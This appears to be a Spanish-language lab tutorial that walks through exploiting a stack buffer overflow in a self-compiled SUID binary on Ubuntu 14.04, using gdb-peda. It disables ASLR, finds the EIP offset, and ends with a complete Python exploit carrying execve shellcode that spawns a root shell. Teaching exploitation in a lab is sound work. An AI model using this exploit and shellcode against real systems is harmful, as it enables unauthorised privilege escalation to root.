Stack Buffer Overflow en Linux
En este artículo vemos cómo explotar un stack buffer overflow en un sistema Linux. Nos aprovecharemos de un desbordamiento de memoria en un binario en el que a nivel de código no se ha tenido en cuenta el controlar la cantidad de bytes que se le pueden enviar. Además, al tener el binario permisos SUID nos permitirá realizar una escalada de privilegios y obtener una shell de root.
De nuevo agradecimientos a s4vitar por sus tutoriales.
Utilizaremos una máquina virtual con Ubuntu Server 14.04 x86, gdb como debuguer y peda para añadir funcionalidades extra a gdb.
Nos conectamos por ssh a la máquina ubuntu y empezamos.
Primero instalaremos gdb, git y gcc desde la línea de comandos apt install gdb git gcc
Después necesitaremos instalar peda como complemento de gdb, para ello vamos a la página del proyecto en github https://github.com/longld/peda y ejecutamos estos dos comandos:
git clone https://github.com/longld/peda.git ~/peda`<br>
echo "source ~/peda/peda.py" >> ~/.gdbinit
A continuación crearemos un sencillo código en lenguaje C para después compilarlo y obtener el binario sobre el que trabajaremos.
En este código simplemente se llama a una función que se llama vulnerable, le pasamos lo que pongamos como primer argumento, que se guarda en una variable llamada buff. Después definimos otra variable buffer a la que le asignamos un tamaño de buffer de 64 bytes, y hacemos una copia de buff a buffer, con lo cual, si el tamaño de bytes que enviamos supera esos 64 se producirá el desbordamiento que nos permitirá explotar la vulnerabilidad.
Lo compilamos de la siguiente forma:
gcc -z execstack -g -fno-stack-protector -mpreferred-stack-boundary=2 ejercicio.c -o vuln
Nos creará un binario llamado vuln, al que le asignaremos de usuario propietario root y permisos SUID, lo que hace que se pueda ejecutar temporalmente con los permisos del usuario propietario, en este caso root, lo que nos permitirá cuando explotemos el buffer overflow que nos devuelva una shell de root. Lo ejecutaremos como usuario ximo y nos devolverá una shell de root.
Lo siguiente será ponernos como usuario root y ejecutar los siguientes comandos:
chown root:root vuln
chmod u+s vuln
El primero pondrá como propietario y grupo asignado al usuario root y el segundo le aplicará permiso SUID al binario.
Empieza la explotación
Si ejecutamos el binario y le pasamos como parámetro cualquier cadena menor a 64 bytes vemos que no pasa nada. Ejemplo: ./vuln holaquetal
Pero si le pasamos a través de python por ejemplo 100 “A” vemos que corrompe el programa y nos devuelve una violación de segmento.
Al pasarle más bytes de los que acepta la variable buffer hemos sobreescrito registros de la memoria que ahora apuntan a direcciones de memoria que no tienen sentido y por eso corrompe el programa.
En este punto si ejecutamos gdb vuln entraremos en el debuguer para ver que está ocurriendo con la ejecución del programa. Una vez dentro de gdb si ejecutamos checksec vuln vemos que tiene todas las protecciones deshabilitadas, esto es así porque lo hemos compilado con unos parámetros para que no las tenga y poder entender como funciona el buffer overflow.
En el siguiente paso tendremos que deshabilitar la aleatorización de las direcciones de memoria. Explicado de forma sencilla sería que de forma predeterminada el kernel de linux asigna direcciones de memoria aleatorias que van cambiando con cada ejecución. En este ejemplo para hacer la explotación más fácil y entender como funciona lo vamos a deshabilitar.
Si ejecutamos ldd vuln
varias veces veremos que la librería libc cada vez apunta a una dirección de memoria diferente. Para deshabilitarlo nos ponemos como usuario root y ejecutamos
echo 0 > /proc/sys/kernel/randomize_va_space
Por defecto tiene un valor de 2, y ahora nosotros lo hemos puesto a 0.
Bien, ahora ejecutamos el debuguer junto al binario gdb vuln
. Si ponemos r holaquetal
estaremos haciendo lo mismo de antes pero desde dentro del debuguer. Probamos con r $(python -c 'print "A"*100')
y nos fijamos en lo que nos muestra gdb. Podemos ver que el registro EIP que siempre apunta a la próxima dirección de memoria a ejecutar ahora vale 0x41414141, que son nuestras “A” en hexadecimal. Por eso corrompe el programa, porque 0x41414141 no es una dirección de memoria válida.
Ahora se trata, como en el artículo anterior en el que explotábamos el stack buffer overflow en una máquina windows, de tomar el control del registro EIP, para que el flujo del programa se desplace hasta la dirección que nosotros queramos, que será donde habremos sobreescrito lo que haya con nuestro shellcode o instrucciones maliciosas, que nos deovlverán una shell , en este caso de root por ser el binario SUID.
Creamos un patrón de 100 carácteres aleatorios, ejecutamos el binario con ese patrón y vemos el valor de EIP. Esto lo hacemos desde gdb con pattern arg 100
y luego r
para ejecutarlo.
Vemos que ahora EIP vale 0x41413341. Pues ahora con patern search
nos muestra el offset del EIP, que es la cantidad exacta de bytes que tenemos que pasarle al binario justo antes de que se sobreescriba el EIP. De esta forma tendremos el control del registro EIP y podremos sobreescribirlo con lo que queramos. En este caso el offset es 68.
Seguidamente, para comprobar que tenemos el control del registro EIP le pasaremos al binario 68 “A” + 4 “B”, y si vemos que EIP apunta a la dirección 0x42424242 que son nuestras “B” en hexadecimal, tendremos el control pudiendo hacer que EIP apunte donde nosotros queramos. Lo probamos y vemos que efectívamente EIP apunta a 0x42424242.
Bien pues ahora le pasaremos 68 “A” + 4 “B” + 200 “C” y vemos como las 200 “C” se colocan en la pila o stack, sobreescribiendo un montón de direcciones de memoria. Esto lo podemos ver ejecutando x/100wx $esp
. Todas las direcciones de memoria en las que pone 0x43434343 son nuestras “C”.
A continuación lo que hacemos es pasarle al binario NOPs (\x90), que son instrucciones que no ejecutan nada, simplemente hacen que el flujo de ejecución se desplace a través de ellos sin hacer nada. Lo hacemos de esta forma:
r $(python -c 'print "A"*68 + "B"*4 + "\x90"*200')
Si volvemos a ejecutar x/100wx $esp
vemos nuestros NOPs.
Ahora podemos hacer que el registro EIP apunte a una dirección intermedia dentro de los NOPs para que el flujo de ejecución se desplace hasta donde terminan estos NOPs, que será donde sobreescribiremos lo que haya con nuestro shellcode que nos ejecutará un /bin/sh y nos devolverá una shell.
Hacemos
r $(python -c 'print "A"*68 + "\x34\xf6\xff\xbf" + "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
y vemos que efectívamente nos devuelve una shell. Si ejecutamos whoami
nos devuelve ximo, pero esto es porque estamos dentro del gdb, ahora lo haremos desde fuera del gdb con python y veremos como nos devuelve una shell de root.
Nos creamos un fichero exploit.py con el siguiente contenido:
#!/usr/bin/python
from struct import pack
if __name__ == '__main__':
offset = 68
junk = "A"*offset
EIP = pack("<I", 0xbffff634) # \x34\xf6\xff\xbf
nops = "\x90"*200
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
payload = junk + EIP + nops + shellcode
print payload
Y ahora ejecutamos el binario pasándole el output del resultado de ejecutar python exploit.py y vemos que nos devuelve una shell de root. Hemos conseguido redirigir el flujo de ejecución del programa para que se desplace hasta donde hemos sobreescrito la memoria con nuestro shellcode, para que lo ejecute y nos devuelva una shell, en este caso de root por tener el binaro permiso SUID.